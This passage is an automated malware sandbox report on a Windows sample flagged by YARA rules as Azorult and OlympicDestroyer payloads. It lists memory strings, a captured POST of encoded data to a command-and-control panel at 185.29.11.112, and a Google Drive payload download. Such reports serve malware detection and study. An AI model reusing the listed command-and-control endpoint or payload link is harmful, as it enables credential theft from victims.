1COK25f1vT.exe, 0000000C.00000003.491844346.000000001F610000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492301830.000000001F6F0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.515276537.000000001FF80000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491938965.000000001F6E0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.483738780.000000001F990000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.489216061.000000001F1EC000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.484708142.000000001F9E4000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.484234075.000000001F998000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.487925295.000000001F1CC000.00000004.00000001.sdmp, mozglue.dll.12.dr, softokn3.dll.12.dr, nssdbm3.dll.12.dr, freebl3.dll.12.dr, nss3.dll.12.drString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
                  Source: 1COK25f1vT.exe, 0000000C.00000003.484184430.000000001F9EC000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.487119055.000000001F238000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.484675523.000000001F998000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.487230327.000000001F364000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.487823577.000000001F1F0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492897666.000000001F85C000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492773065.000000001F838000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.485757428.000000001F368000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492649482.000000001F820000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491908994.000000001F660000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.485890632.000000001F290000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491844346.000000001F610000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492301830.000000001F6F0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.515276537.000000001FF80000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491938965.000000001F6E0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.483738780.000000001F990000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.489216061.000000001F1EC000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.484708142.000000001F9E4000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.484234075.000000001F998000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.487925295.000000001F1CC000.00000004.00000001.sdmp, mozglue.dll.12.dr, softokn3.dll.12.dr, nssdbm3.dll.12.dr, freebl3.dll.12.dr, nss3.dll.12.drString found in binary or memory: http://ts-ocsp.ws.symantec.com07
                  Source: mozglue.dll.12.drString found in binary or memory: http://www.mozilla.com/en-US/blocklist/
                  Source: 1COK25f1vT.exe, 0000000C.00000003.484184430.000000001F9EC000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.487119055.000000001F238000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.484675523.000000001F998000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.487230327.000000001F364000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.487823577.000000001F1F0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492897666.000000001F85C000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492773065.000000001F838000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.485757428.000000001F368000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492649482.000000001F820000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491908994.000000001F660000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.485890632.000000001F290000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491844346.000000001F610000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492301830.000000001F6F0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.515276537.000000001FF80000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491938965.000000001F6E0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.483738780.000000001F990000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.489216061.000000001F1EC000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.484708142.000000001F9E4000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.484234075.000000001F998000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.487925295.000000001F1CC000.00000004.00000001.sdmp, mozglue.dll.12.dr, softokn3.dll.12.dr, nssdbm3.dll.12.dr, freebl3.dll.12.dr, nss3.dll.12.drString found in binary or memory: http://www.mozilla.com0
                  Source: 1COK25f1vT.exe, 0000000C.00000002.515276537.000000001FF80000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/de-ch/
                  Source: 364961566067931661861453.tmp.12.dr, 364969067119854362121246.tmp.12.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                  Source: 364961566067931661861453.tmp.12.dr, 364969067119854362121246.tmp.12.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                  Source: 1COK25f1vT.exe, 1COK25f1vT.exe, 0000000C.00000002.510992835.0000000000401000.00000020.00020000.sdmpString found in binary or memory: https://dotbit.me/a/
                  Source: 1COK25f1vT.exe, 0000000C.00000002.511282880.0000000002150000.00000004.00000001.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=17RU0VECH2DoNYHaGWGuE-Ywt9AUTzsM-
                  Source: 364961566067931661861453.tmp.12.dr, 364969067119854362121246.tmp.12.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                  Source: 364961566067931661861453.tmp.12.dr, 364969067119854362121246.tmp.12.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                  Source: 364961566067931661861453.tmp.12.dr, 364969067119854362121246.tmp.12.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                  Source: 364961566067931661861453.tmp.12.dr, 364969067119854362121246.tmp.12.drString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
                  Source: 364961566067931661861453.tmp.12.dr, 364969067119854362121246.tmp.12.drString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                  Source: 1COK25f1vT.exe, 0000000C.00000003.484184430.000000001F9EC000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.487119055.000000001F238000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.484675523.000000001F998000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.487230327.000000001F364000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.487823577.000000001F1F0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492897666.000000001F85C000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492773065.000000001F838000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.485757428.000000001F368000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492649482.000000001F820000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491908994.000000001F660000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.485890632.000000001F290000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491844346.000000001F610000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492301830.000000001F6F0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.515276537.000000001FF80000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491938965.000000001F6E0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.483738780.000000001F990000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.489216061.000000001F1EC000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.484708142.000000001F9E4000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.484234075.000000001F998000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.487925295.000000001F1CC000.00000004.00000001.sdmp, mozglue.dll.12.dr, softokn3.dll.12.dr, nssdbm3.dll.12.dr, freebl3.dll.12.dr, nss3.dll.12.drString found in binary or memory: https://www.digicert.com/CPS0
                  Source: 1COK25f1vT.exe, 0000000C.00000002.515276537.000000001FF80000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/thank-you.html
                  Source: 364961566067931661861453.tmp.12.dr, 364969067119854362121246.tmp.12.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                  Source: unknownHTTP traffic detected: POST /rothchildnew/Panel/index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Host: 185.29.11.112Content-Length: 107Cache-Control: no-cacheData Raw: 4a 4f ed 3e 32 ed 3e 3c 89 28 39 fe 49 2f fb 38 2f fa 49 4c ed 3e 33 ed 3e 3e ed 3e 3b ed 3e 3e ed 3e 33 ed 3e 3a ed 3e 3d ed 3f 4e 89 28 39 fd 28 39 ff 4e 4e 8d 28 39 ff 28 39 f1 28 38 8c 4b 4f ed 3e 33 ed 3e 3c ed 3e 3d ed 3e 3a ed 3e 3b 8a 28 38 8c 28 39 f1 28 39 fb 28 39 fa 28 39 ff 4f 2f fb 3c 2f fb 38 2f fb 34 4b Data Ascii: JO>2><(9I/8/IL>3>>>;>>>3>:>=?N(9(9NN(9(9(8KO>3><>=>:>;(8(9(9(9(9O/</8/4K
                  Source: unknownDNS traffic detected: queries for: drive.google.com
                  Source: C:\Users\user\Desktop\1COK25f1vT.exeCode function: 12_2_00417D84 GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,HttpOpenRequestA,HttpSendRequestA,GetMessageA,InternetReadFile,12_2_00417D84
                  Source: global trafficHTTP traffic detected: GET /uc?export=download&id=17RU0VECH2DoNYHaGWGuE-Ywt9AUTzsM- HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/7bnkiq90sqb2f9a5rfbavvv8a7avoa21/1639944750000/11699732749327025486/*/17RU0VECH2DoNYHaGWGuE-Ywt9AUTzsM-?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-0o-b4-docs.googleusercontent.comConnection: Keep-Alive
                  Source: unknownHTTPS traffic detected: 172.217.168.46:443 -> 192.168.2.3:49786 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.217.168.1:443 -> 192.168.2.3:49787 version: TLS 1.2

                  System Summary:

                  barindex
                  Potential malicious icon foundShow sources
                  Source: initial sampleIcon embedded in PE file: bad icon match: 20047c7c70f0e004
                  Malicious sample detected (through community Yara rule)Show sources
                  Source: 12.2.1COK25f1vT.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Azorult Payload Author: kevoreilly
                  Source: 12.2.1COK25f1vT.exe.2004391e.5.raw.unpack, type: UNPACKEDPEMatched rule: OlympicDestroyer Payload Author: kevoreilly
                  Source: 12.2.1COK25f1vT.exe.1ffd81cd.7.raw.unpack, type: UNPACKEDPEMatched rule: OlympicDestroyer Payload Author: kevoreilly
                  Source: 12.2.1COK25f1vT.exe.1ffb61e0.6.raw.unpack, type: UNPACKEDPEMatched rule: OlympicDestroyer Payload Author: kevoreilly
                  Source: 1COK25f1vT.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                  Source: 12.2.1COK25f1vT.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
                  Source: 12.2.1COK25f1vT.exe.2004391e.5.raw.unpack, type: UNPACKEDPEMatched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload
                  Source: 12.2.1COK25f1vT.exe.1ffd81cd.7.raw.unpack, type: UNPACKEDPEMatched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload
                  Source: 12.2.1COK25f1vT.exe.1ffb61e0.6.raw.unpack, type: UNPACKEDPEMatched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload
                  Source: C:\Users\user\Desktop\1COK25f1vT.exeCode function: 0_2_004016DC0_2_004016DC
                  Source: C:\Users\user\Desktop\1COK25f1vT.exeCode function: 0_2_02A9128E0_2_02A9128E
                  Source: C:\Users\user\Desktop\1COK25f1vT.exeCode function: 0_2_02A963E90_2_02A963E9
                  Source: C:\Users\user\Desktop\1COK25f1vT.exeCode function: 0_2_02A99D250_2_02A99D25
                  Source: C:\Users\user\Desktop\1COK25f1vT.exeCode function: 0_2_02A91D790_2_02A91D79
                  Source: C:\Users\user\Desktop\1COK25f1vT.exeCode function: 0_2_02A956AA0_2_02A956AA
                  Source: C:\Users\user\Desktop\1COK25f1vT.exeCode function: 0_2_02A99EA70_2_02A99EA7
                  Source: C:\Users\user\Desktop\1COK25f1vT.exeCode function: 0_2_02A94EB10_2_02A94EB1
                  Source: C:\Users\user\Desktop\1COK25f1vT.exeCode function: 0_2_02A946B20_2_02A946B2
                  Source: C:\Users\user\Desktop\1COK25f1vT.exeCode function: 0_2_02A98EB20_2_02A98EB2
                  Source: C:\Users\user\Desktop\1COK25f1vT.exeCode function: 0_2_02A966B60_2_02A966B6
                  Source: C:\Users\user\Desktop\1COK25f1vT.exeCode function: 0_2_02A95A8B0_2_02A95A8B
                  Source: C:\Users\user\Desktop\1COK25f1vT.exeCode function: 0_2_02A94E9A0_2_02A94E9A
                  Source: C:\Users\user\Desktop\1COK25f1vT.exeCode function: 0_2_02A98E9D0_2_02A98E9D
                  Source: C:\Users\user\Desktop\1COK25f1vT.exeCode function: 0_2_02A99E910_2_02A99E91
                  Source: C:\Users\user\Desktop\1COK25f1vT.exeCode function: 0_2_02A99EFE0_2_02A99EFE
                  Source: C:\Users\user\Desktop\1COK25f1vT.exeCode function: 0_2_02A99EC50_2_02A99EC5
                  Source: C:\Users\user\Desktop\1COK25f1vT.exeCode function: 0_2_02A95AC70_2_02A95AC7
                  Source: C:\Users\user\Desktop\1COK25f1vT.exeCode function: 0_2_02A94ED90_2_02A94ED9
                  Source: C:\Users\user\Desktop\1COK25f1vT.exeCode function: 0_2_02A996D90_2_02A996D9
                  Source: C:\Users\user\Desktop\1COK25f1vT.exeCode function: 0_2_02A98EDD0_2_02A98EDD
                  Source: C:\Users\user\Desktop\1COK25f1vT.exeCode function: 0_2_02A98ED10_2_02A98ED1
                  Source: C:\Users\user\Desktop\1COK25f1vT.exeCode function: 0_2_02A946310_2_02A94631
                  Source: C:\Users\user\Desktop\1COK25f1vT.exeCode function: 0_2_02A946370_2_02A94637
                  Source: C:\Users\user\Desktop\1COK25f1vT.exeCode function: 0_2_02A922090_2_02A92209
                  Source: C:\Users\user\Desktop\1COK25f1vT.exeCode function: 0_2_02A99E090_2_02A99E09
                  Source: C:\Users\user\Desktop\1COK25f1vT.exeCode function: 0_2_02A9926A0_2_02A9926A
                  Source: C:\Users\user\Desktop\1COK25f1vT.exeCode function: 0_2_02A99E660_2_02A99E66
                  Source: C:\Users\user\Desktop\1COK25f1vT.exeCode function: 0_2_02A9564D0_2_02A9564D
                  Source: C:\Users\user\Desktop\1COK25f1vT.exeCode function: 0_2_02A95BA90_2_02A95BA9
                  Source: C:\Users\user\Desktop\1COK25f1vT.exeCode function: 0_2_02A957B50_2_02A957B5
                  Source: C:\Users\user\Desktop\1COK25f1vT.exeCode function: 0_2_02A9678E0_2_02A9678E
                  Source: C:\Users\user\Desktop\1COK25f1vT.exeCode function: 0_2_02A98F800_2_02A98F80
                  Source: C:\Users\user\Desktop\1COK25f1vT.exeCode function: 0_2_02A99F9C0_2_02A99F9C
                  Source: C:\Users\user\Desktop\1COK25f1vT.exeCode function: 0_2_02A963ED0_2_02A963ED
                  Source: C:\Users\user\Desktop\1COK25f1vT.exeCode function: 0_2_02A94FEF0_2_02A94FEF
                  Source: C:\Users\user\Desktop\1COK25f1vT.exeCode function: 0_2_02A90BEE0_2_02A90BEE
                  Source: C:\Users\user\Desktop\1COK25f1vT.exeCode function: 0_2_02A94FE60_2_02A94FE6
                  Source: C:\Users\user\Desktop\1COK25f1vT.exeCode function: 0_2_02A98FF90_2_02A98FF9
                  Source: C:\Users\user\Desktop\1COK25f1vT.exeCode function: 0_2_02A983CA0_2_02A983CA
                  Source: C:\Users\user\Desktop\1COK25f1vT.exeCode function: 0_2_02A98FC20_2_02A98FC2
                  Source: C:\Users\user\Desktop\1COK25f1vT.exeCode function: 0_2_02A953DD0_2_02A953DD
                  Source: C:\Users\user\Desktop\1COK25f1vT.exeCode function: 0_2_02A98F2A0_2_02A98F2A
                  Source: C:\Users\user\Desktop\1COK25f1vT.exeCode function: 0_2_02A95B320_2_02A95B32
                  Source: C:\Users\user\Desktop\1COK25f1vT.exeCode function: 0_2_02A967370_2_02A96737
                  Source: C:\Users\user\Desktop\1COK25f1vT.exeCode function: 0_2_02A997180_2_02A99718
                  Source: C:\Users\user\Desktop\1COK25f1vT.exeCode function: 0_2_02A9671B0_2_02A9671B
                  Source: C:\Users\user\Desktop\1COK25f1vT.exeCode function: 0_2_02A9571A0_2_02A9571A
                  Source: C:\Users\user\Desktop\1COK25f1vT.exeCode function: 0_2_02A99F1F0_2_02A99F1F
                  Source: C:\Users\user\Desktop\1COK25f1vT.exeCode function: 0_2_02A947110_2_02A94711
                  Source: C:\Users\user\Desktop\1COK25f1vT.exeCode function: 0_2_02A99F6F0_2_02A99F6F
                  Source: C:\Users\user\Desktop\1COK25f1vT.exeCode function: 0_2_02A967660_2_02A96766
                  Source: C:\Users\user\Desktop\1COK25f1vT.exeCode function: 0_2_02A95B710_2_02A95B71
                  Source: C:\Users\user\Desktop\1COK25f1vT.exeCode function: 0_2_02A957750_2_02A95775
                  Source: C:\Users\user\Desktop\1COK25f1vT.exeCode function: 0_2_02A957480_2_02A95748
                  Source: C:\Users\user\Desktop\1COK25f1vT.exeCode function: 0_2_02A99F460_2_02A99F46
                  Source: C:\Users\user\Desktop\1COK25f1vT.exeCode function: 0_2_02A95CAB0_2_02A95CAB
                  Source: C:\Users\user\Desktop\1COK25f1vT.exeCode function: 0_2_02A948A30_2_02A948A3
                  Source: C:\Users\user\Desktop\1COK25f1vT.exeCode function: 0_2_02A96CB90_2_02A96CB9
                  Source: C:\Users\user\Desktop\1COK25f1vT.exeCode function: 0_2_02A958BB0_2_02A958BB
                  Source: C:\Users\user\Desktop\1COK25f1vT.exeCode function: 0_2_02A954BE0_2_02A954BE
                  Source: C:\Users\user\Desktop\1COK25f1vT.exeCode function: 0_2_02A990B30_2_02A990B3
                  Source: C:\Users\user\Desktop\1COK25f1vT.exeCode function: 0_2_02A9688D0_2_02A9688D
                  Source: C:\Users\user\Desktop\1COK25f1vT.exeCode function: 0_2_02A990910_2_02A99091
                  Source: C:\Users\user\Desktop\1COK25f1vT.exeCode function: 0_2_02A964970_2_02A96497
                  Source: C:\Users\user\Desktop\1COK25f1vT.exeCode function: 0_2_02A95CEA0_2_02A95CEA
                  Source: C:\Users\user\Desktop\1COK25f1vT.exeCode function: 0_2_02A990EE0_2_02A990EE
                  Source: C:\Users\user\Desktop\1COK25f1vT.exeCode function: 0_2_02A964E60_2_02A964E6
                  Source: C:\Users\user\Desktop\1COK25f1vT.exeCode function: 0_2_02A980C00_2_02A980C0
                  Source: C:\Users\user\Desktop\1COK25f1vT.exeCode function: 0_2_02A938DA0_2_02A938DA
                  Source: C:\Users\user\Desktop\1COK25f1vT.exeCode function: 0_2_02A95C210_2_02A95C21
                  Source: C:\Users\user\Desktop\1COK25f1vT.exeCode function: 0_2_02A954250_2_02A95425
                  Source: C:\Users\user\Desktop\1COK25f1vT.exeCode function: 0_2_02A9683D0_2_02A9683D
                  Source: C:\Users\user\Desktop\1COK25f1vT.exeCode function: 0_2_02A990350_2_02A99035
                  Source: C:\Users\user\Desktop\1COK25f1vT.exeCode